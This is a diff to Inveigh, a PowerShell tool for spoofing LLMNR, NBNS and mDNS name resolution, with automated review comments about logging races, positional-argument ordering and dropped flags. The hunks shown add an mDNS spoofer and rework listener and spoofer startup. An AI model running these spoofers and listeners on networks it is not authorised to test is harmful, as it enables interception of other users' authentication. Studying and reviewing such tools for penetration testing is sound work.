+ param ($ConsoleQueueLimit,$NBNSBruteForcePause,$RunCount,$RunTime)
$inveigh.control = $true
@@ -2941,11 +3666,15 @@ $control_scriptblock =
catch
{
$inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
}
}
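Review bot: the removed line suppressed the return value of `$inveigh.log.Add(...)` with `> $null`, and the replacement inside the new log_output block drops it. If `$inveigh.log` is an ArrayList, Add returns the new index, and inside a scriptblock started with BeginInvoke that value lands in the runspace's output collection and accumulates for the life of the control loop. Keep `> $null` on the Add calls here (the cleanup code at the end of this diff still has it) and consider the same for the queue Add calls in the spoofer scriptblocks.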
@@ -2954,33 +3683,41 @@ $control_scriptblock =
Start-Sleep -S 1
$inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") > $null
- Start-Sleep -S 1
- $inveigh.running = $false
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - Inveigh exited due to $exit_message" | Out-File $Inveigh.log_out_file -Append
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
}
+ Start-Sleep -S 1
+ $inveigh.running = $false
+
if($inveigh.relay_running)
{
Start-Sleep -S 1
$inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") > $null
- Start-Sleep -S 1
- $inveigh.relay_running = $false
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message" | Out-File $Inveigh.log_out_file -Append
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
}
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
+ }
+
+ Start-Sleep -S 1
+ $inveigh.relay_running = $false
+
}
- $inveigh.HTTP = $false
$inveigh.HTTPS = $false
-
}
if($NBNSBruteForcePause)
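Review bot: the "Inveigh exited" and "Inveigh Relay exited" entries were previously written synchronously with Out-File; they are now only appended to `$inveigh.log_file_queue` one second before `$inveigh.running` and `$inveigh.relay_running` are set to `$false`. Unless whatever drains log_file_queue to disk keeps running after those flags drop, the final entries of a run can be lost; either flush the queue here before clearing the flags or keep a direct Out-File write for the exit message. Separately, `$inveigh.HTTP = $false` is removed while `$inveigh.HTTPS = $false` stays; if the HTTP flag is now cleared elsewhere that is fine, otherwise this looks like an accidental drop.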
@@ -3070,6 +3807,16 @@ $control_scriptblock =
}
+ if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0)
+ {
+
+ while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output)
+ {
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
Start-Sleep -m 5
}
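Review bot: the trim loop calls `$inveigh.console_queue.RemoveAt(0)` from the control runspace while the spoofer and listener runspaces call `.Add` on the same collection; unless console_queue is a synchronized collection, or the loop takes a lock on it, concurrent Add/RemoveAt on an ArrayList can throw or corrupt the list. Also, `RemoveAt(0)` shifts the whole backing array on every iteration, so with a large backlog and a small `$ConsoleQueueLimit` this loop is quadratic; removing the excess in one `RemoveRange(0, $count - $ConsoleQueueLimit)` call under the same lock is cheaper.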
@@ -3079,7 +3826,7 @@ $control_scriptblock =
# End ScriptBlocks
# Begin Startup Functions
-# HTTP/HTTPS Listener Startup Function
+# HTTP Listener Startup Function
function HTTPListener()
{
$proxy_listener = $false
@@ -3094,13 +3841,14 @@ function HTTPListener()
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
$HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument(
+ $WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
Start-Sleep -m 50
-# HTTP/HTTPS Listener Startup Function
+# HTTPS Listener Startup Function
function HTTPSListener()
{
$proxy_listener = $false
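Review bot: `$WPADAuthIgnore` is inserted positionally between `$WPADAuth` and `$WPADResponse` here and in the next two listener start-up functions; the order must match the param() list of the HTTP listener scriptblock, which is outside this diff, and an off-by-one is silent because every following argument is simply shifted into the wrong parameter. With this many positional arguments, passing at least the new one with `AddParameter('WPADAuthIgnore',$WPADAuthIgnore)` would make the three call sites robust to future reordering.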
@@ -3115,7 +3863,8 @@ function HTTPSListener()
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
$HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument(
+ $WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTPS_powershell.BeginInvoke() > $null
}
@@ -3136,7 +3885,8 @@ function ProxyListener()
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
$HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument(
+ $WPADAuthIgnore).AddArgument($WPADResponse) > $null
$proxy_powershell.BeginInvoke() > $null
}
@@ -3150,16 +3900,17 @@ function SnifferSpoofer()
$sniffer_powershell.Runspace = $sniffer_runspace
$sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument(
- $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument(
- $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument(
- $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
- $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval).AddArgument(
- $RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null
+ $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($IP).AddArgument($LLMNR).AddArgument(
+ $LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument(
+ $mDNS_response_message).AddArgument($mDNSTypes).AddArgument($mDNSTTL).AddArgument(
+ $NBNS).AddArgument($NBNS_response_message).AddArgument($NBNSTypes).AddArgument($NBNSTTL).AddArgument(
+ $SMB).AddArgument($SpooferHostsIgnore).AddArgument($SpooferHostsReply).AddArgument(
+ $SpooferIP).AddArgument($SpooferIPsIgnore).AddArgument($SpooferIPsReply).AddArgument(
+ $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval) > $null
$sniffer_powershell.BeginInvoke() > $null
}
-# LLMNR Spoofer Startup function
+# Unprivileged LLMNR Spoofer Startup Function
function LLMNRSpoofer()
{
$LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
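Review bot: the sniffer argument list is completely reordered and `$RunTime` is dropped from it; since these are positional, the new order has to match the sniffer scriptblock's param() one-for-one and that scriptblock is not in this diff, so please confirm it was updated in the same commit and no longer references $RunTime. Passing these by name with AddParameter would remove this class of mistake.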
@@ -3168,14 +3919,30 @@ function LLMNRSpoofer()
$LLMNR_spoofer_powershell = [PowerShell]::Create()
$LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace
$LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument(
+ $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument(
$SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
$LLMNRTTL) > $null
$LLMNR_spoofer_powershell.BeginInvoke() > $null
}
-# NBNS Spoofer Startup function
+# Unprivileged mDNS Spoofer Startup Function
+function mDNSSpoofer()
+{
+ $mDNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
+ $mDNS_spoofer_runspace.Open()
+ $mDNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $mDNS_spoofer_powershell = [PowerShell]::Create()
+ $mDNS_spoofer_powershell.Runspace = $mDNS_spoofer_runspace
+ $mDNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $mDNS_spoofer_powershell.AddScript($mDNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
+ $mDNS_response_message).AddArgument($mDNSTTL).AddArgument($mDNSTypes).AddArgument($SpooferIP).AddArgument(
+ $SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
+ $SpooferIPsIgnore) > $null
+ $mDNS_spoofer_powershell.BeginInvoke() > $null
+}
+
+# Unprivileged NBNS Spoofer Startup Function
function NBNSSpoofer()
{
$NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
@@ -3184,14 +3951,14 @@ function NBNSSpoofer()
$NBNS_spoofer_powershell = [PowerShell]::Create()
$NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace
$NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($NBNS_response_message).AddArgument(
- $SpooferIP).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument(
- $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
- $NBNSTTL) > $null
+ $NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
+ $NBNS_response_message).AddArgument($SpooferIP).AddArgument($NBNSTypes).AddArgument(
+ $SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
+ $SpooferIPsIgnore).AddArgument($NBNSTTL) > $null
$NBNS_spoofer_powershell.BeginInvoke() > $null
}
-# Spoofer Startup function
+# NBNS Brute Force Spoofer Startup Function
function NBNSBruteForceSpoofer()
{
$NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
@@ -3206,7 +3973,7 @@ function NBNSBruteForceSpoofer()
$NBNS_bruteforce_spoofer_powershell.BeginInvoke() > $null
}
-# Control Startup Function
+# Control Loop Startup Function
function ControlLoop()
{
$control_runspace = [RunspaceFactory]::CreateRunspace()
@@ -3215,8 +3982,8 @@ function ControlLoop()
$control_powershell = [PowerShell]::Create()
$control_powershell.Runspace = $control_runspace
$control_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $control_powershell.AddScript($control_scriptblock).AddArgument($NBNSBruteForcePause).AddArgument(
- $RunCount).AddArgument($RunTime) > $null
+ $control_powershell.AddScript($control_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
+ $NBNSBruteForcePause).AddArgument($RunCount).AddArgument($RunTime) > $null
$control_powershell.BeginInvoke() > $null
}
@@ -3243,11 +4010,11 @@ if($Proxy -eq 'Y')
}
# Sniffer/Spoofer Start
-if(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y' -or $Inspect) -and $elevated_privilege)
+if(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y' -or $Inspect) -and $elevated_privilege)
{
SnifferSpoofer
}
-elseif(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privilege)
+elseif(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privilege)
{
if($LLMNR -eq 'Y')
@@ -3255,6 +4022,11 @@ elseif(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privi
LLMNRSpoofer
}
+ if($mDNS -eq 'Y')
+ {
+ mDNSSpoofer
+ }
+
if($NBNS -eq 'Y')
{
NBNSSpoofer
@@ -3274,11 +4046,12 @@ if($NBNSBruteForce -eq 'Y')
}
# Control Loop Start
-if($RunCount -or $RunTime -or $inveigh.file_output -or $NBNSBruteForcePause)
+if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $NBNSBruteForcePause -or $RunCount -or $RunTime)
{
ControlLoop
}
+# Console Output Loop
if($inveigh.console_output)
{
@@ -3500,44 +4273,57 @@ if($inveigh)
catch
{
Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
if($inveigh.file_output)
{
"$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
}
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+ }
+
}
}
if($inveigh.relay_running)
{
- $inveigh.relay_running = $false
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
if($inveigh.file_output)
{
"$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
}
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+ }
+
+ Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+ $inveigh.relay_running = $false
+
}
if($inveigh.running)
{
- $inveigh.running = $false
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
if($inveigh.file_output)
{
"$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
}
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
+ }
+
+ Write-Output("Inveigh exited at $(Get-Date -format 's')")
+ $inveigh.running = $false
+
}
- $inveigh.HTTP = $false
$inveigh.HTTPS = $false
Start-Sleep -S 5
}
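Review bot: same asymmetry as in the control scriptblock: `$inveigh.HTTP = $false` is removed here too while `$inveigh.HTTPS = $false` is kept, so after a stop the HTTP flag remains set unless it is cleared elsewhere. Note also that this cleanup path still writes to the log file directly with Out-File while the control scriptblock now goes through log_file_queue; if both can run around shutdown, entries can land in the file out of order.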